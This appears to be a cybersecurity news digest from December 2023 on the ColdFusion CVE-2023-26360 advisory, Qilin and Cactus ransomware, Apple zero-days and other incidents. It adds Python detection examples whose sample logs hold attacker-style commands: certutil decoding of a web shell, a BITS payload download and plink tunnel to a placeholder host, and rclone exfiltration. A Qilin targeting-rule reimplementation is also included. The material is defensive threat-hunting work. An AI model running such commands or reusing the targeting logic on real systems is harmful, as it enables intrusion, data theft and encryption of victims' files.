Autosummary: New P2PInfect bot targets routers and IoT devices, by Pierluigi Paganini, December 04, 2023. Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. "


            Threat Actors Exploit Adobe ColdFusion CVE-2023-26360 for Initial Access to Government Servers

            exploits government
            2023-12-04 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a

            SUMMARY

            The Cybersecurity and Infrastructure Security Agency (CISA) is releasing a Cybersecurity Advisory (CSA) in response to confirmed exploitation of CVE-2023-26360 by unidentified threat actors at a Federal Civilian Executive Branch (FCEB) agency. This vulnerability presents as an improper access control issue impacting Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier). CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations; however, they are no longer supported since they reached end of life. Exploitation of this CVE can result in arbitrary code execution. Following the FCEB agency’s investigation, analysis of network logs confirmed the compromise of at least two public-facing servers within the environment between June and July 2023.

            This CSA provides network defenders with tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and methods to detect and protect against similar exploitation.

            Download the PDF version of this report:

            For a downloadable copy of IOCs, see:

AA23-339A STIX XML (XML, 23.83 KB)

            Autosummary: Threat actors were observed dropping the file d.txt —decoded as d.jsp —via POST command in addition to eight malicious artifacts ( hiddenfield.jsp , hiddenfield_jsp.class , hiddenfield_jsp.java , Connection.jsp , Connection_jsp.class , Connection_jsp.java , d_jsp.class , and d_jsp.java/ ).Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.MITRE: certutil [3] VirusTotal: File - a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 [4] Bleeping Computer: Stealthy New JavaScript Malware Infects Windows PCs with RATs [5] GitHub: Tas9er/ByPassGodzilla [6] MITRE: esentutl [7] Microsoft: Active Directory - SYSVOL [8] Microsoft:Restrict NTLM authentication policy settings, including incoming NTLM traffic from client computers, other member servers, or a domain controller.[8] VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. This CSA provides network defenders with tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and methods to detect and protect against similar exploitation.Organizations typically store external-facing services and resources—as well as servers used for DNS, file transfer protocol (FTP), mail, proxy, voice over internet protocol (VoIP)—and web servers in the DMZ.Organizations typically store external-facing services and resources—as well as servers used for DNS, file transfer protocol (FTP), mail, proxy, voice over internet protocol (VoIP)—and web servers in the DMZ.CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. 
TECHNICAL DETAILS. Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14.
Incident 1: As early as June 26, 2023, threat actors obtained an initial foothold on a public-facing [T1190] web server running Adobe ColdFusion v2016.0.0.3 through exploitation of CVE-2023-26360. The threat actors also collected information about local [T1087.001] and domain [T1087.002] administrative user accounts while performing reconnaissance by using commands such as localgroup, net user, net user /domain, and ID. Had the attempt succeeded, the threat actors may have been able to change policies across compromised servers.[7] Note: During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface.
Incident 2: As early as June 2, 2023, threat actors obtained an initial foothold on an additional public-facing web server running Adobe ColdFusion v2021.0.0.2 via malicious IP address 125.227.50[.]97 through exploitation of CVE-2023-26360.
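The artifact names and the LOLBin and account-discovery commands listed above are the concrete things a defender can hunt for on a ColdFusion host. The following Python script is an added example (not CISA tooling) that scans a web root for the named JSP/class/java artifacts and flags process-creation log lines carrying certutil -decode, esentutl, net user /domain or localgroup. The log line format, the host name cfweb01 and the sample paths are constructed for the demo, and the regexes are assumptions about how those commands appear on a Windows command line.

```python
"""Hunt for AA23-339A web-shell artifacts and LOLBin/discovery commands.

Added example, not CISA tooling. Artifact names come from the advisory text;
the log format, host name and sample paths below are constructed.
"""
import os
import re
import tempfile

# File names named in the advisory (matched case-insensitively).
WEB_SHELL_ARTIFACTS = {
    "d.txt", "d.jsp", "d_jsp.class", "d_jsp.java",
    "hiddenfield.jsp", "hiddenfield_jsp.class", "hiddenfield_jsp.java",
    "connection.jsp", "connection_jsp.class", "connection_jsp.java",
}

# Assumed command-line shapes for the tools the advisory maps to ATT&CK
# (certutil, esentutl) and the account-discovery commands it lists.
SUSPICIOUS_CMD = [
    ("certutil-decode", re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I)),
    ("esentutl", re.compile(r"\besentutl(\.exe)?\b", re.I)),
    ("domain-account-discovery", re.compile(r"\bnet(\.exe)?\s+user\s+/domain\b", re.I)),
    ("local-group-discovery", re.compile(r"\blocalgroup\b", re.I)),
]

# Constructed log shape: "... parent=<image> cmd="<command line>""
LOG_RE = re.compile(r'parent=(?P<parent>\S+)\s+cmd="(?P<cmd>[^"]*)"')


def find_web_shell_artifacts(web_root):
    """Return full paths under web_root whose file name is a known artifact."""
    hits = []
    for root, _dirs, files in os.walk(web_root):
        for name in files:
            if name.lower() in WEB_SHELL_ARTIFACTS:
                hits.append(os.path.join(root, name))
    return sorted(hits)


def find_suspicious_commands(log_lines):
    """Return (tag, parent image, command line) for each matching log line."""
    findings = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        for tag, pattern in SUSPICIOUS_CMD:
            if pattern.search(m.group("cmd")):
                findings.append((tag, m.group("parent"), m.group("cmd")))
                break  # one tag per line is enough for triage
    return findings


# Constructed process-creation events, not real telemetry.
SAMPLE_LOG = [
    '2023-06-26T14:02:11Z host=cfweb01 parent=coldfusion.exe cmd="cmd.exe /c net user /domain"',
    '2023-06-26T14:03:45Z host=cfweb01 parent=coldfusion.exe cmd="certutil.exe -decode d.txt d.jsp"',
    '2023-06-26T14:04:10Z host=cfweb01 parent=coldfusion.exe cmd="esentutl.exe /y C:\\inetpub\\wwwroot\\d.txt /d C:\\Windows\\Temp\\d.jsp"',
    '2023-06-26T14:05:00Z host=cfweb01 parent=explorer.exe cmd="notepad.exe C:\\Users\\ops\\notes.txt"',
]


def demo_artifact_scan():
    """Plant two artifacts in a throwaway web root and return the base names found."""
    root = tempfile.mkdtemp(prefix="cfroot-")
    os.makedirs(os.path.join(root, "CFIDE"))
    for rel in ("index.cfm", os.path.join("CFIDE", "hiddenfield.jsp"), os.path.join("CFIDE", "d.txt")):
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write("constructed sample, not a real web shell\n")
    return sorted(os.path.basename(p) for p in find_web_shell_artifacts(root))


if __name__ == "__main__":
    print("artifacts:", demo_artifact_scan())
    for tag, parent, cmd in find_suspicious_commands(SAMPLE_LOG):
        print(f"{tag:<26} parent={parent} cmd={cmd}")
```

The artifact match is by file name only; a real hunt should also hash the matches against the VirusTotal reference above and check the web server's access log for the POST that delivered d.txt. certutil and esentutl are legitimate administrative tools, so the command findings are triage leads, not verdicts; the parent image (here coldfusion.exe) is what makes them interesting.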


            Essequibo: Venezuela votes on claim to Guyana-controlled oil region

            industry
            2023-12-03 https://www.bbc.co.uk/news/world-latin-america-67583582?at_medium=RSS&at_campaign=KARANGA
            The referendum asks if Venezuelans support the claim to two thirds of the land controlled by Guyana.


            Linux version of Qilin ransomware focuses on VMware ESXi

            exploits ransomware Linux
            2023-12-03 https://www.bleepingcomputer.com/news/security/linux-version-of-qilin-ransomware-focuses-on-vmware-esxi/
            A sample of the Qilin ransomware gang's VMware ESXi encryptor has been found and it could be one of the most advanced and customizable Linux encryptors seen to date. [...]

            Autosummary: In the sample analyzed by BleepingComputer.com, the encryptor is configured by default with the following exclusions and targeting criteria:
            Processes not to terminate: "kvm", "qemu", "xen"
            Directories excluded from encryption: "/boot/", "/proc/", "/sys/", "/run/", "/dev/", "/lib/", "/etc/", "/bin/", "/mbr/", "/lib64/", "/vmware/lifecycle/", "/vdtc/", "/healthd/"
            Files excluded from encryption: "initrd", "vmlinuz", "basemisc.tgz", "boot.cfg", "bootpart.gz", "features.gz", "imgdb.tgz", "jumpstrt.gz", "onetime.tgz", "state.tgz", "useropts.gz"
            File extensions excluded from encryption: "v00", "v01", "v02", "v03", "v04", "v05", "v06", "v07", "v08", "v09", "b00", "b01", "b02", "b03", "b04", "b05", "b06", "b07", "b08", "b09", "t00", "t01", "t02", "t03", "t04", "t05", "t06", "t07", "t08", "t09"
            Directories targeted for encryption: "/home", "/usr/home", "/tmp", "/var/www", "/usr/local/www", "/mnt", "/media", "/srv", "/data", "/backup", "/var/lib/mysql", "/var/mail", "/var/spool/mail", "/var/vm", "/var/lib/vmware", "/opt/virtualbox", "/var/lib/xen", "/var/opt/xen", "/kvm", "/var/lib/docker", "/var/lib/libvirt", "/var/run/sr-mount", "/var/lib/postgresql", "/var/lib/redis", "/var/lib/mongodb", "/var/lib/couchdb", "/var/lib/neo4j", "/var/lib/cassandra", "/var/lib/riak", "/var/lib/influxdb", "/var/lib/elasticsearch"
            File extensions targeted for encryption: "3ds", "3g2", "3gp", "7z", "aac", "abw", "ac3", "accdb", "ai", "aif", "aiff", "amr", "apk", "app", "asf", "asx", "atom", "avi", "bak", "bat", "bmp", "bup", "bz2", "cab", "cbr", "cbz", "cda", "cdr", "chm", "class", "cmd", "conf", "cow", "cpp", "cr2", "crdownload", "cs", "csv", "cue", "cur", "dat", "db", "dbf", "dds", "deb", "der", "desktop", "dmg", "dng", "doc", "docm", "dot", "dotm", "dotx", "dpx", "drv", "dtd", "dvi", "dwg", "dxf", "eml", "eps", "epub", "f4v", "fnt", "fon", "gam", "ged", "gif", "gpx", "gz", "h264", "hdr", "hpp", "hqx", "htm", "html", "ibooks", "ico", "ics", "iff", "image", "img", "indd", "iso", "jar", "java", "jfif", "jpe", "jpeg", "jpf", "jpg", "js", "json", "jsp", "key", "kml", "kmz", "log", "m4a", "m4b", "m4p", "m4v", "mcd", "mdbx", "mht", "mid", "mkv", "ml", "mobi", "mov", "mp3", "mp4", "mpa", "mpeg", "mpg", "msg", "nes", "numbers", "odp", "ods", "odt", "ogg", "ogv", "otf", "ova", "ovf", "pages", "parallels", "pcast", "pct", "pdb", "pdf", "pds", "pef", "php", "pkg", "pl", "plist", "png", "pptm", "prproj", "ps", "psd", "ptx", "py", "qcow", "qcow2", "qed", "qt", "r3d", "ra", "rar", "rm", "rmvb", "rtf", "rv", "rw2", "sh", "shtml", "sit", "sitx", "sketch", "spx", "sql", "srt", "svg", "swf", "tar", "tga", "tgz", "thmx", "tif", "tiff", "torrent", "ttf", "txt", "url", "vdi", "vhd", "vhdx", "vmdk", "vmem", "vob", "vswp", "vvfat", "wav", "wbmp", "webm", "webp", "wm", "wma", "wmv", "wpd", "wps", "xhtml", "xlsm", "xml", "xspf", "xvid", "yaml", "yml", "zip", "zipx"
            Configuring a list of virtual machines that should not be encrypted is also possible. The Qilin ransomware operation was initially launched as "Agenda" in August 2022.

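Read as a policy, the Qilin lists above say which data the encryptor goes after (VM disk, memory and swap files under /var/lib/vmware, /mnt and /var/vm, database directories, backups, archives) and which it deliberately leaves alone so an ESXi host still boots and can display the ransom note (the boot-bank .v00/.b00/.t00 modules, boot.cfg, state.tgz, everything under /boot). The following Python function is an added example, not Qilin code, that applies those default rules to a path so a defender can see which files on a host would be in scope. Whether the real encryptor matches directory prefixes or substrings is not stated in the article, so prefix matching is an assumption, and the target-extension set is a subset of the full list above.

```python
"""Which paths fall inside the Qilin Linux encryptor's default targeting rules.

Added example built from the lists in the article; it is not Qilin code.
Directory matching is by path prefix (an assumption), and TARGET_EXTS is a
subset of the article's full extension list.
"""
import os

EXCLUDED_DIRS = ["/boot/", "/proc/", "/sys/", "/run/", "/dev/", "/lib/", "/etc/", "/bin/",
                 "/mbr/", "/lib64/", "/vmware/lifecycle/", "/vdtc/", "/healthd/"]
EXCLUDED_FILES = {"initrd", "vmlinuz", "basemisc.tgz", "boot.cfg", "bootpart.gz", "features.gz",
                  "imgdb.tgz", "jumpstrt.gz", "onetime.tgz", "state.tgz", "useropts.gz"}
# v00-v09, b00-b09, t00-t09: the ESXi boot-bank module extensions.
EXCLUDED_EXTS = {f"{prefix}{n:02d}" for prefix in "vbt" for n in range(10)}
TARGET_DIRS = ["/home", "/usr/home", "/tmp", "/var/www", "/usr/local/www", "/mnt", "/media",
               "/srv", "/data", "/backup", "/var/lib/mysql", "/var/mail", "/var/spool/mail",
               "/var/vm", "/var/lib/vmware", "/opt/virtualbox", "/var/lib/xen", "/var/opt/xen",
               "/kvm", "/var/lib/docker", "/var/lib/libvirt", "/var/run/sr-mount",
               "/var/lib/postgresql", "/var/lib/redis", "/var/lib/mongodb", "/var/lib/couchdb",
               "/var/lib/neo4j", "/var/lib/cassandra", "/var/lib/riak", "/var/lib/influxdb",
               "/var/lib/elasticsearch"]
# Subset of the article's target extensions: VM images, backups, databases, archives, text.
TARGET_EXTS = {"vmdk", "vmem", "vswp", "vhd", "vhdx", "qcow", "qcow2", "vdi", "ova", "ovf",
               "bak", "sql", "db", "tar", "gz", "tgz", "zip", "7z", "conf", "log",
               "sh", "py", "txt", "pdf", "doc", "xml", "yaml", "yml", "json"}


def _under(path, directory):
    """True if path is the directory itself or lies beneath it (prefix match, assumed)."""
    d = directory.rstrip("/")
    return path == d or path.startswith(d + "/")


def classify(path):
    """Return (in_scope, reason) for an absolute path under the default config.

    Exclusions are applied before targeting, which is the only order that keeps
    the boot-bank files and /boot safe even though /home and /mnt are targeted.
    """
    path = os.path.normpath(path)
    name = os.path.basename(path)
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    for d in EXCLUDED_DIRS:
        if _under(path, d):
            return False, f"excluded directory {d}"
    if name in EXCLUDED_FILES:
        return False, "excluded file name"
    if ext in EXCLUDED_EXTS:
        return False, f"excluded extension .{ext}"
    if not any(_under(path, d) for d in TARGET_DIRS):
        return False, "outside targeted directories"
    if ext not in TARGET_EXTS:
        return False, f"extension .{ext or '(none)'} not targeted"
    return True, "targeted directory and extension"


def in_scope(path):
    return classify(path)[0]


if __name__ == "__main__":
    for p in ("/var/lib/vmware/vm1/vm1.vmdk", "/mnt/datastore1/vm2/vm2-flat.vmdk",
              "/home/admin/state.tgz", "/bootbank/s.v00", "/etc/passwd", "/var/lib/mysql/ibdata1"):
        print(f"{p:<40} {classify(p)}")
```

Two things the evaluation makes visible that the raw lists do not: the boot-bank exclusions are what keep the host bootable, and a file such as /var/lib/mysql/ibdata1 escapes the default rules only because it has no extension, so "extension not in list" is not a safety guarantee for data you care about.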

            North Korea's state hackers stole $3 billion in crypto since 2017

            government
            2023-12-03 https://www.bleepingcomputer.com/news/security/north-koreas-state-hackers-stole-3-billion-in-crypto-since-2017/
            North Korean-backed state hackers have stolen an estimated $3 billion in a long string of hacks targeting the cryptocurrency industry over the six years since January 2017. [...]

            Autosummary: In the last two years, North Korean Lazarus hackers have been linked to crypto heists against the Harmony blockchain bridge ($100 million in losses), the Nomad bridge ($190 million in losses), the Qubit Finance bridge ($80 million in losses), and the largest crypto hack ever after breaching the Ronin Network cross-chain bridge and stealing $620 million.


            New proxy malware targets Mac users through pirated software

            exploits
            2023-12-03 https://www.bleepingcomputer.com/news/security/new-proxy-malware-targets-mac-users-through-pirated-software/
            Cybercriminals are targeting Mac users with a new proxy trojan malware bundled with popular, copyrighted macOS software being offered on warez sites. [...]

            Autosummary: The most popular of the trojanized software in this campaign are: 4K Video Donwloader Pro, Aissessoft Mac Data Recovery, Aiseesoft Mac Video Converter Ultimate, AnyMP4 Android Data Recovery for Mac, Downie 4, FonePaw Data Recovery, Sketch, Wondershare UniConverter 13, SQLPro Studio, and Artstudio Pro. Kaspersky says that unlike the legitimate software, which is distributed as disk images, the trojanized versions are downloaded as PKG files.


            New Agent Raccoon malware targets the Middle East, Africa and the US

            exploits
            2023-12-03 https://securityaffairs.com/155137/malware/agent-raccoon-malware.html
            Threat actors are using the Agent Raccoon malware in attacks against organizations in the Middle East, Africa and the U.S. Unit42 researchers uncovered a new backdoor named Agent Raccoon, which is being used in attacks against organizations in the Middle East, Africa, and the U.S. The malware was used in attacks against multiple industries, including […]

            Autosummary: By Pierluigi Paganini, December 03, 2023.


            Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware

            exploits rusia-ucrania
            2023-12-02 https://thehackernews.com/2023/12/russian-hacker-vladimir-dunaev.html
            A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced. Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later. "Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data


            Quinto Inuma: Peru environmentalist who fought for Amazon shot dead

            latam
            2023-12-02 https://www.bbc.co.uk/news/world-latin-america-67597566?at_medium=RSS&at_campaign=KARANGA
            The government expressed "deep regret" over Quinto Inuma's death, describing the attack as "cowardly".


            US Health Dept urges hospitals to patch critical Citrix Bleed bug

            exploits
            2023-12-02 https://www.bleepingcomputer.com/news/security/us-health-dept-urges-hospitals-to-patch-critical-citrix-bleed-bug/
            The U.S. Department of Health and Human Services (HHS) warned hospitals this week to patch the critical "Citrix Bleed" Netscaler vulnerability actively exploited in attacks. [...]

            Autosummary: "This urgent warning by HC3 signifies the seriousness to the Citrix Bleed vulnerability and the urgent need to deploy the existing Citrix patches and upgrades to secure our systems," said John Riggi, a cybersecurity and risk advisor for the American Hospital Association, a healthcare industry trade group that represents 5,000 hospitals and healthcare providers across the U.S. "This situation also demonstrates the aggressiveness by which foreign ransomware gangs, primarily Russian-speaking groups, continue to target hospitals and health systems."


            Could X go bankrupt under Elon Musk?

            financial
            2023-12-02 https://www.bbc.co.uk/news/technology-67599937?at_medium=RSS&at_campaign=KARANGA
            Musk's profane attack on advertisers baffled experts - without adverts, how would X survive?


            Key drivers of software security for financial services

            financial
            2023-12-01 https://www.helpnetsecurity.com/2023/12/01/financial-services-security-flaws-video/

            Nearly 72% of applications in the financial services sector contain security flaws, according to Veracode. Despite the alarming figure, this rate of software vulnerability was the lowest of all industries analyzed and has improved since last year. The research also indicates that financial services organizations have benefitted significantly from automation through API usage and interactive security training, with the two factors lowering the chance of flaw introduction by 19% per month. In this Help Net … More

            The post Key drivers of software security for financial services appeared first on Help Net Security.


            Zero-Day Alert: Apple Rolls Out iOS, macOS, and Safari Patches for 2 Actively Exploited Flaws

            exploits
            2023-12-01 https://thehackernews.com/2023/12/zero-day-alert-apple-rolls-out-ios.html
            Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software. The vulnerabilities, both of which reside in the WebKit web browser engine, are described below - CVE-2023-42916 - An out-of-bounds read issue that could be exploited to


            Qlik Sense flaws exploited in Cactus ransomware campaign

            exploits ransomware
            2023-12-01 https://www.helpnetsecurity.com/2023/12/01/qlik-sense-cactus-ransomware/

            Attackers are exploiting three critical vulnerabilities in internet-facing Qlik Sense instances to deliver Cactus ransomware to target organizations, Arctic Wolf researchers have warned. The exploited vulnerabilities Qlik Sense is a business intelligence and data analytics solution popular with governmental organizations and enterprises. Attackers wielding Cactus ransomware have previously been seen breaching large commercial organizations by exploiting vulnerabilities in VPN appliances. The group also engages in double-extortion tactics. “Based on patch level Qlik Sense is likely … More

            Autosummary: The attack: After a successful exploitation, the attackers leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download the following tools that allow them to gain persistence and remotely control the system: renamed ManageEngine UEMS executables posing as Qlik files; the AnyDesk remote solution, pulled from the official site; a Plink (PuTTY Link) binary renamed to putty.exe. The attackers also uninstalled Sophos’ endpoint security solution, changed the admin password, set up an RDP tunnel via Plink and used it for lateral movement, analyzed disk space with WizTree and used rclone (renamed as svchost.exe) to exfiltrate data.
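The tool chain above (a BITS download launched from PowerShell, Plink renamed to putty.exe, rclone renamed to svchost.exe, AnyDesk fetched from the vendor site) can be caught in process-creation telemetry by comparing each binary's on-disk name with the original file name embedded in its PE version resource, which renaming does not change. The following Python is an added example, not Arctic Wolf's detection content; the events are constructed dicts shaped like Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage), and the Qlik Engine.exe parent path and the address 203.0.113.10 are placeholders.

```python
"""Flag renamed tooling and PowerShell-driven BITS downloads in process events.

Added example modelled on the Cactus/Qlik Sense chain described above; not
Arctic Wolf's detection content. Events are constructed, shaped like Sysmon
Event ID 1 fields. The Qlik parent path and 203.0.113.10 are placeholders.
"""
import ntpath

# Tools named in the write-up, keyed by the OriginalFileName the PE carries.
TOOL_ORIGINAL_NAMES = {"rclone.exe": "rclone", "plink.exe": "plink", "anydesk.exe": "anydesk"}
BITS_MARKERS = ("start-bitstransfer", "bitsadmin")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _base(path):
    return ntpath.basename(path).lower()


def inspect_event(ev):
    """Return a list of alert strings for one process-creation event."""
    alerts = []
    image = _base(ev.get("Image", ""))
    orig = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    parent = _base(ev.get("ParentImage", ""))

    # 1. A known tool executing under a different file name (masquerading).
    if orig in TOOL_ORIGINAL_NAMES and image != orig:
        alerts.append(f"{TOOL_ORIGINAL_NAMES[orig]} renamed to {image}")
    # 2. svchost.exe running from anywhere but System32/SysWOW64.
    if image == "svchost.exe":
        directory = ntpath.dirname(ev.get("Image", "")).lower()
        if not directory.endswith(("\\system32", "\\syswow64")):
            alerts.append(f"svchost.exe outside System32: {ev['Image']}")
    # 3. A BITS transfer started by, or from, PowerShell.
    if (image in POWERSHELL or parent in POWERSHELL) and any(m in cmd for m in BITS_MARKERS):
        alerts.append("BITS transfer from PowerShell")
    return alerts


def scan(events):
    """Return (event index, alert) pairs over a list of events."""
    return [(i, a) for i, ev in enumerate(events) for a in inspect_event(ev)]


# Constructed events following the chain in the article.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell -c "Start-BitsTransfer -Source http://203.0.113.10/p.exe -Destination C:\\ProgramData\\putty.exe"',
     "ParentImage": r"C:\Program Files\Qlik\Sense\Engine\Engine.exe"},  # assumed Qlik path
    {"Image": r"C:\ProgramData\putty.exe", "OriginalFileName": "Plink.exe",
     "CommandLine": "putty.exe -R 3389:127.0.0.1:3389 203.0.113.10",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": "svchost.exe copy C:\\Shares remote:exfil",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {alert}")
```

The OriginalFileName comparison is the durable part: it survives any rename, and it also catches the ManageEngine UEMS binaries posing as Qlik files once their original names are added to the table. The path check on svchost.exe is a cheap second signal for the same rclone case. The genuine svchost.exe from System32 in the last event produces nothing, which is the false-positive case worth keeping in the sample.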


            Apple patches two zero-days used to target iOS users (CVE-2023-42916 CVE-2023-42917)

            exploits
            2023-12-01 https://www.helpnetsecurity.com/2023/12/01/cve-2023-42916-cve-2023-42917/

            With the latest round of security updates, Apple has fixed two zero-day WebKit vulnerabilities (CVE-2023-42916, CVE-2023-42917) that “may have been exploited against versions of iOS before iOS 16.7.1.” About the vulnerabilities (CVE-2023-42916, CVE-2023-42917): CVE-2023-42916 is an out-of-bounds read flaw, while CVE-2023-42917 is a vulnerability allowing for exploitable memory corruption. Both affect WebKit, the Apple-developed browser engine used by the company’s Safari web browser and all web browsers on iOS and iPadOS. CVE-2023-42916 may lead to … More



            CISA adds ownCloud and Google Chrome bugs to its Known Exploited Vulnerabilities catalog

            exploits
            2023-12-01 https://securityaffairs.com/155037/security/cisa-known-exploited-vulnerabilities-catalog-owncloud-chrome.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added ownCloud and Google Chrome vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two issues are: CVE-2023-6345 – a high-severity integer overflow in Skia. Skia is an open-source 2D graphics library that provides […]

            Autosummary: By Pierluigi Paganini, December 01, 2023.


            LogoFAIL bugs in UEFI code allow planting bootkits via images

            exploits
            2023-12-01 https://www.bleepingcomputer.com/news/security/logofail-bugs-in-uefi-code-allow-planting-bootkits-via-images/
            Multiple security vulnerabilities collectively named LogoFAIL affect image-parsing components in the UEFI code from various vendors. Researchers warn that they could be exploited to hijack the execution flow of the booting process and to deliver bootkits. [...]

            Autosummary: "When these images are parsed during boot, the vulnerability can be triggered and an attacker-controlled payload can arbitrarily be executed to hijack the execution flow and bypass security features like Secure Boot, including hardware-based Verified Boot mechanisms (like Intel Boot Guard, AMD Hardware-Validated Boot or ARM TrustZone-based Secure Boot)" - Binarly. Planting malware in such a way ensures persistence on the system that is virtually undetected, as illustrated in past attacks leveraging infected UEFI components [1, 2].


            Cable Transaction Assurance enhances the efficacy of front-line financial crime controls

            financial
            2023-12-01 https://www.helpnetsecurity.com/2023/12/01/cable-transaction-assurance/

            Cable launched Transaction Assurance, pioneering a new wave of financial crime compliance and transaction testing. “In recent years, we’ve witnessed a surge in compliance lapses, highlighted by billions in fines levied against major institutions for financial crime failures. These cases have brought to light gaps in existing protocols, including systemic failures in manual testing,” said Natasha Vernier, CEO, Cable. “These industry shortcomings are why we developed Transaction Assurance. It helps illuminate the vast, often untested … More

            Autosummary: It offers banks, fintechs, and payment platforms the only fully automated and continuous effectiveness testing solution for financial transactions, ensuring strict adherence to regulatory requirements related to transaction monitoring as well as sanctions, Suspicious Activity Reports (SARs), and the “Travel Rule.”


            New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia

            financial exploits
            2023-12-01 https://thehackernews.com/2023/12/new-fjordphantom-android-malware.html
            Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023. "Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app


            Black Basta Ransomware gang accumulated at least $107 million in Bitcoin ransom payments since early 2022

            exploits ransomware
            2023-12-01 https://securityaffairs.com/155054/cyber-crime/black-basta-ransomware-activities.html
            The Black Basta ransomware gang infected over 300 victims, accumulating ransom payments exceeding $100 million since early 2022. The Black Basta ransomware group has been active since April 2022; like other ransomware operations, it implements a double-extortion attack model. Joint research by Elliptic and Corvus Insurance revealed that the group accumulated at least […]

            Autosummary: By Pierluigi Paganini, December 01, 2023.


            Hackers use new Agent Raccoon malware to backdoor US targets

            exploits
            2023-12-01 https://www.bleepingcomputer.com/news/security/hackers-use-new-agent-raccoon-malware-to-backdoor-us-targets/
            A novel malware named "Agent Raccoon" (or Agent Racoon) is being used in cyberattacks against organizations in the United States, the Middle East, and Africa. [...]

            Autosummary: The attackers are believed to be nation-state threat actors. The malware was discovered by Palo Alto Networks' Unit 42, which reports seeing victims spanning various sectors, including government, telecommunications, education, real estate, retail, and non-profit organizations.


            French government recommends against using foreign chat apps

            government
            2023-12-01 https://www.bleepingcomputer.com/news/security/french-government-recommends-against-using-foreign-chat-apps/
            Prime Minister of France Élisabeth Borne signed a circular last week requesting all government employees to uninstall foreign communication apps such as Signal, WhatsApp, and Telegram by December 8, 2023, in favor of a French messaging app named "Olvid." [...]


            Windows 10 KB5032278 update adds Copilot AI assistant, fixes 13 bugs

            exploits
            2023-12-01 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5032278-update-adds-copilot-ai-assistant-fixes-13-bugs/
            Microsoft has started rolling out its Copilot AI assistant to Windows 10 with the KB5032278 November 2023 non-security preview update for systems running Windows 10, version 22H2. [...]

            Autosummary: KB5032278 preview update (BleepingComputer). Other highlights in November's preview update: the Windows 10 KB5032278 optional cumulative release also comes with improvements and 18 bug fixes, some of the more significant ones highlighted below. If you use Home or Pro consumer devices or non-managed business devices, you can get some of the newest experiences as soon as they are ready. "Because of reduced operations during the Western holidays and the upcoming new year, there won't be a non-security preview release for the month of December 2023," Microsoft said.


            Apple secures WebKit as global ransomware attacks surge

            exploits ransomware
            2023-12-01 https://www.computerworld.com/article/3711378/apple-secures-webkit-as-global-ransomware-attacks-surge.html#tk.rss_security

            If nothing else, Apple’s most recent emergency security update should be considered proof of an increasingly tense security environment.

            Enterprises must understand that while Apple maintains a pretty solid ecosystem — certainly at present the most secure, even according to Cisco — that doesn’t mean it’s entirely safe, and every Apple customer needs to get wise to the growing proliferation of threats.

            With more and more business users turning to the company’s solutions, it’s important to get ahead of the threat.

            Autosummary: Michael Covington, vice president of portfolio strategy at Jamf, explained: “These latest OS updates, which address bugs in Apple’s WebKit, show that attackers continue to focus on exploiting the framework that downloads and presents web-based content. Security researchers, meanwhile, continue to kick WebKit around in their attempt to find vulnerabilities before the bad guys do, and hopefully get an Apple security bounty payment for their trouble.


            The Week in Ransomware - December 1st 2023 - Police hits affiliates

            exploits ransomware
            2023-12-01 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-1st-2023-police-hits-affiliates/
            An international law enforcement operation claims to have dismantled a ransomware affiliate operation in Ukraine, which was responsible for attacks on organizations in 71 countries. [...]

